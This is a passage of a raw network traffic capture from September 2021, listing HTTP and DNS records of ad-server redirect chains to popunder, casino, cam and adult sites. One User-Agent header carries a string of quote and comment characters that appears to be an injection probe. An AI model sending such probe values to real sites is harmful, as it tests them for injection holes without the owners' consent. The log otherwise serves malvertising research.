User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://eu.dspultra.com/api/reverse?var=4345477&feedId533
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 06 Sep 2021 09:54:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 80
Connection: keep-alive
Location: https://www.onlinehollandcasino.net/roulette/
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
-
GEThttp://www.baidu.com/RequestGET / HTTP/1.1
Host: www.baidu.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 7077.134.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.156 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: BAIDUID=A218E24C24F547CF1D51AB14A6739446:FG=1; H_WISE_SIDS=107314_110085_127969_168389_176550_176677_177370_177954_177992_178384_178636_179347_179425_180276_181106_181126_181135_181218_181251_181405_181487_181590_181709_181825_181875_181942_182190_182530_182663_182684_182847_182882_183031_183225_183235_183329_183345_183536_183587_183611_183870_183927_183955_183976_184009_184160_184203_184321_184359_184716_184722_184736_184789_184793_184809_184894_184912_185037_185358_185520_185750_185891_186142_186314_186319; rsv_i=e390rfXLqK%2F2qgRPifpM4EPp2o9ksNpl28l7Ypa93ZRtMwzPhxifcBm7rXytAw2sp6dSDKYgfusbs30dKwTg07aj0ORJgUs; BIDUPSID=A218E24C24F547CF1D51AB14A6739446; PSTM=1630921801; BD_HOME=1; H_PS_PSSID=34433_34439_34496_31254_34554_34004_34092_34518_26350_34471
ResponseHTTP/1.1 200 OK
Bdpagetype: 1
Bdqid: 0xe1e695b100002af0
Cache-Control: private
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html;charset=utf-8
Date: Mon, 06 Sep 2021 09:54:17 GMT
Expires: Mon, 06 Sep 2021 09:54:17 GMT
Server: BWS/1.1
Set-Cookie: BDSVRTM=10; path=/
Set-Cookie: BD_HOME=1; path=/
Set-Cookie: H_PS_PSSID=34433_34439_34496_31254_34554_34004_34092_34518_26350_34471; path=/; domain=.baidu.com
Traceid: 1630922057039514753016277862490618997488
X-Frame-Options: sameorigin
X-Ua-Compatible: IE=Edge,chrome=1
Transfer-Encoding: chunked
-
GEThttp://alfad.pro/ad/ad?p=266933&w=622695&t=6313b4b5a2c529e1&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=622695&t=6313b4b5a2c529e1&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/622695
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:17 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://txxx.uk/index.htmRequestGET /index.htm HTTP/1.1
Host: txxx.uk
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:16 GMT
Content-Type: text/html
Content-Length: 301
Last-Modified: Fri, 30 Jul 2021 01:05:55 GMT
Connection: keep-alive
ETag: "61035073-12d"
Accept-Ranges: bytes
-
DNSwww.soloprotect.comRequestwww.soloprotect.comIN AResponsewww.soloprotect.comIN A188.94.75.241
-
DNSwww.soloprotect.comRequestwww.soloprotect.comIN AResponsewww.soloprotect.comIN A188.94.75.241
-
DNSwww.soloprotect.comRequestwww.soloprotect.comIN AResponsewww.soloprotect.comIN A188.94.75.241
-
DNSgoogle.comRequestgoogle.comIN AResponsegoogle.comIN A142.251.36.46
-
DNScontent-autofill.googleapis.comRequestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A142.251.36.42
-
DNSwww.soloprotect.comRequestwww.soloprotect.comIN AResponsewww.soloprotect.comIN A188.94.75.241
-
DNSsafebrowsing.googleapis.comRequestsafebrowsing.googleapis.comIN AResponsesafebrowsing.googleapis.comIN A142.250.179.202
-
DNScontent-autofill.googleapis.comRequestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A142.251.36.10
-
DNSi.clean.ggRequesti.clean.ggIN AResponsei.clean.ggIN A34.95.69.49
-
DNSbaide.ruRequestbaide.ruIN AResponsebaide.ruIN A5.181.218.143
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSxxxclub.xyzRequestxxxclub.xyzIN AResponsexxxclub.xyzIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSbypuxogy.comRequestbypuxogy.comIN AResponsebypuxogy.comIN A188.72.219.36
-
DNSqihuu.netRequestqihuu.netIN AResponseqihuu.netIN A5.181.218.143
-
DNSlangke.ruRequestlangke.ruIN AResponselangke.ruIN A212.107.18.203
-
DNSgradinoneathouse.xyzRequestgradinoneathouse.xyzIN AResponsegradinoneathouse.xyzIN A34.196.13.28
-
DNSxml.bid-engine.comRequestxml.bid-engine.comIN AResponsexml.bid-engine.comIN CNAMEad-maven.xml.ak-is2.netad-maven.xml.ak-is2.netIN A198.134.116.29
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627547&t=f93d98137aefc4fd&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627547&t=f93d98137aefc4fd&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 YaBrowser/18.6.1.392 (beta) Yowser/2.5 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627547
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:23 GMT
Location: https://www.fpcpopunder.com/popunder/popunder.cgi?program=light&account=pub_fpc_popcash&track=A
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSyesdd.liveRequestyesdd.liveIN AResponseyesdd.liveIN A212.107.18.203
-
DNS789ff.liveRequest789ff.liveIN AResponse789ff.liveIN A212.107.18.203
-
DNSonetag-sys.comRequestonetag-sys.comIN AResponseonetag-sys.comIN A51.89.9.253onetag-sys.comIN A51.38.120.206onetag-sys.comIN A51.89.9.254onetag-sys.comIN A51.89.9.251onetag-sys.comIN A51.89.9.252
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
GEThttp://alfad.pro/ad/ad?p=266933&w=629271&t=1c0f4b00d84f1dd8&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=629271&t=1c0f4b00d84f1dd8&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/629271
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSbaide.liveRequestbaide.liveIN AResponsebaide.liveIN A212.107.18.203
-
DNSelevisions.bizRequestelevisions.bizIN AResponseelevisions.bizIN A65.9.73.56elevisions.bizIN A65.9.73.21elevisions.bizIN A65.9.73.41elevisions.bizIN A65.9.73.69
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSmomass.xyzRequestmomass.xyzIN AResponsemomass.xyzIN A178.238.238.213
-
GEThttp://nsparket.top/redirect?tid=922703RequestGET /redirect?tid=922703 HTTP/1.1
Host: nsparket.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; LLD-L31 Build/HONORLLD-L31; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36 GSA/9.61.9.21.arm64
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://momav.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:54:23 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
cache-control: no-store, no-cache, must-revalidate, no-transform
pragma: no-cache
p3p: CP="NID DSP ALL COR"
set-cookie: csu=e00c74c3-23c1-47b8-82fa-e514363cb6b4
location: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNakEyTTN3eE9HRmtPVGxoTnpkbE9EUm1ZV0kyTlRrNU5qRmlPR0ZoWWpFNE1qTXlOZy0tfGh0dHBzOi8vY2Ftc29kYTEuY29tL3JlZGlyLz9pZD1leG9yZW1zb2RhbW9iaXBvcHVzfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTczMjU0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8MjU4NTc4OXw0MzM1ODU0MnwxMXwxMDB8NDR8MHw1ODh8OTIyNzAzfDkwfDc1fFVTRHxVU0R8MXwxfDIyfHwxfFVTQXx8MTZ8MnwwfHw1MWNjYjYzN2NkMDM4ZDMwMmViOTljODMyMTg1ZjY2M3xhOWM2OGQzMmY1MWIxN2ZjOTIzMmViYzIzODNjNDdmZnwxfDB8bW9tYXYudXN8MHwwfDB8MC4xMnwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwxfDE0NDB8fDB8MHwwfDB8MHwwfDF8MHxPS3w4NWYwNDgzNjFlMDU1NDhjMGQ1NTI5OWRjMTMxODM1YQ--
x-cache: Miss from cloudfront
via: 1.1 4f516e51d4c38a41272c9098bf829774.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS50-C1
x-amz-cf-id: QxAoqGJIkoBl5BbVAyltcAlX0ak6sj-3xvc00obbqjXnxJpCk_wqTA==
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MedGgASnWi2ke4Xj9Kn9zMte71rbL1pV6HfGvZ5d%2Bax%2FM3Zlx44aNGEMFkbw3q1Q8tVeqI4f69edV%2BrVwbhFDO9D3TGDZbrb0qPa2309%2FomxzKsz7QEyUaufwBdJG14%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6d0cd9875fa14-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
GEThttp://alfad.pro/ad/ad?p=266933&w=619593&t=5e5fb175e0ecf0bf&r=aHR0cCUzQSUyRiUyRndlYjQuc2V4eWJvZHkueHl6JTJGdW5nd2ViNC5waHA=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=619593&t=5e5fb175e0ecf0bf&r=aHR0cCUzQSUyRiUyRndlYjQuc2V4eWJvZHkueHl6JTJGdW5nd2ViNC5waHA=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/619593
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:23 GMT
Location: https://bongacams7.com/track?v=2&c=602941
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://alfad.pro/ad/ad?p=266933&w=626162&t=8b3f19afaf302052&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=626162&t=8b3f19afaf302052&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 OPR/39.0.2256.71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/626162
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:23 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://gradinoneathouse.xyz/RequestGET / HTTP/1.1
Host: gradinoneathouse.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0 IceDragon/58.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:23 GMT
Content-Type: text/html
Content-Length: 932
Connection: close
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
X-Content-Type-Options: nosniff
-
GEThttp://momass.xyz/index.htmlRequestGET /index.html HTTP/1.1
Host: momass.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:23 GMT
Content-Type: text/html
Content-Length: 266
Last-Modified: Wed, 18 Aug 2021 08:41:42 GMT
Connection: keep-alive
ETag: "611cc7c6-10a"
Accept-Ranges: bytes
-
GEThttp://xxxclub.xyz/index.htmlRequestGET /index.html HTTP/1.1
Host: xxxclub.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; ASU2JS; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:23 GMT
Content-Type: text/html
Content-Length: 293
Last-Modified: Tue, 17 Aug 2021 09:44:11 GMT
Connection: keep-alive
ETag: "611b84eb-125"
Accept-Ranges: bytes
-
GEThttp://elevisions.biz/redirect?tid=934187RequestGET /redirect?tid=934187 HTTP/1.1
Host: elevisions.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xxxlist.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627611&t=8ace6778be072e45&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627611&t=8ace6778be072e45&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627611
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:23 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
DNSyesww.pwRequestyesww.pwIN AResponseyesww.pwIN A212.107.18.203
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSd1ev866ubw90c6.cloudfront.netRequestd1ev866ubw90c6.cloudfront.netIN AResponsed1ev866ubw90c6.cloudfront.netIN A13.227.211.201d1ev866ubw90c6.cloudfront.netIN A13.227.211.22d1ev866ubw90c6.cloudfront.netIN A13.227.211.67d1ev866ubw90c6.cloudfront.netIN A13.227.211.108
-
DNSlangmm.ruRequestlangmm.ruIN AResponselangmm.ruIN A212.107.18.203
-
DNSjavsex.usRequestjavsex.usIN AResponsejavsex.usIN A207.180.237.38
-
DNSqitan.ruRequestqitan.ruIN AResponseqitan.ruIN A212.107.18.203
-
DNSlangke.fr.amRequestlangke.fr.amIN AResponselangke.fr.amIN A212.107.18.203
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSyaojav.comRequestyaojav.comIN AResponseyaojav.comIN A172.67.205.115yaojav.comIN A104.21.52.235
-
GEThttp://alfad.pro/go/266933/628726RequestGET /go/266933/628726 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:54:29 GMT
Server: nginx
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/628927RequestGET /go/266933/628927 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:54:29 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://javsex.us/index.htmRequestGET /index.htm HTTP/1.1
Host: javsex.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:28 GMT
Content-Type: text/html
Content-Length: 287
Last-Modified: Fri, 02 Jul 2021 01:10:42 GMT
Connection: keep-alive
ETag: "60de6792-11f"
Accept-Ranges: bytes
-
GEThttp://d1ev866ubw90c6.cloudfront.net/?buved=931937RequestGET /?buved=931937 HTTP/1.1
Host: d1ev866ubw90c6.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0s6qso;//';//";//%>?>zzrfp'/"<wz232
Accept: */*
Referer: http://digitalmedium.xyz/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 48618
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:54:29 GMT
access-control-allow-origin: *
Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
Content-Encoding: gzip
Pragma: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4cc2a0a7eb7d5483edc69be298297f9e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: QoS8yuYBmOulOTQghkFFWC-CeK0W4FkUwE5Ab1Op2StsNZolv7XJ5g==
-
GEThttp://yaojav.com/adv.htmlRequestGET /adv.html HTTP/1.1
Host: yaojav.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:54:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Thu, 05 Aug 2021 16:10:29 GMT
vary: Accept-Encoding
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gRh6YgdZlgBEKGWFbb9I6L3giAlE6Awn8QXeb58OxUd9cg3nUeE6tsLDQHS78j8kB00g0WxxLAuRaV5HuP%2FvYUvMQGDnz9M8bT1tqjEJUubj5opi1hVtFGbRnAbZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6d0f3b87900ac-AMS
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
DNSs.yimg.comRequests.yimg.comIN AResponses.yimg.comIN CNAMEedge.gycpi.b.yahoodns.netedge.gycpi.b.yahoodns.netIN A87.248.116.12edge.gycpi.b.yahoodns.netIN A87.248.116.11
-
DNSsb.scorecardresearch.comRequestsb.scorecardresearch.comIN AResponsesb.scorecardresearch.comIN A52.222.139.45sb.scorecardresearch.comIN A52.222.139.90sb.scorecardresearch.comIN A52.222.139.77sb.scorecardresearch.comIN A52.222.139.23
-
DNSjita.rtk.ioRequestjita.rtk.ioIN A
-
DNSjita.rtk.ioRequestjita.rtk.ioIN A
-
DNSjita.rtk.ioRequestjita.rtk.ioIN A
-
DNSjita.rtk.ioRequestjita.rtk.ioIN A
-
DNSjita.rtk.ioRequestjita.rtk.ioIN A
-
DNSxxxmom.ruRequestxxxmom.ruIN AResponsexxxmom.ruIN A167.86.103.60
-
DNSjpteen.usRequestjpteen.usIN AResponsejpteen.usIN A207.180.237.38
-
DNSbaide.liveRequestbaide.liveIN AResponsebaide.liveIN A212.107.18.203
-
GEThttp://jpteen.us/index.htmlRequestGET /index.html HTTP/1.1
Host: jpteen.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:35 GMT
Content-Type: text/html
Content-Length: 267
Last-Modified: Fri, 28 May 2021 07:00:36 GMT
Connection: keep-alive
ETag: "60b09514-10b"
Accept-Ranges: bytes
-
GEThttp://xxxmom.ru/ad.phpRequestGET /ad.php HTTP/1.1
Host: xxxmom.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSjavhub.vipRequestjavhub.vipIN AResponsejavhub.vipIN A207.180.237.38
-
GEThttp://javhub.vip/goads.htmlRequestGET /goads.html HTTP/1.1
Host: javhub.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 OPR/39.0.2256.71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:40 GMT
Content-Type: text/html
Content-Length: 270
Last-Modified: Thu, 25 Mar 2021 04:42:34 GMT
Connection: keep-alive
ETag: "605c14ba-10e"
Accept-Ranges: bytes
-
GEThttp://hubtube.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: hubtube.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
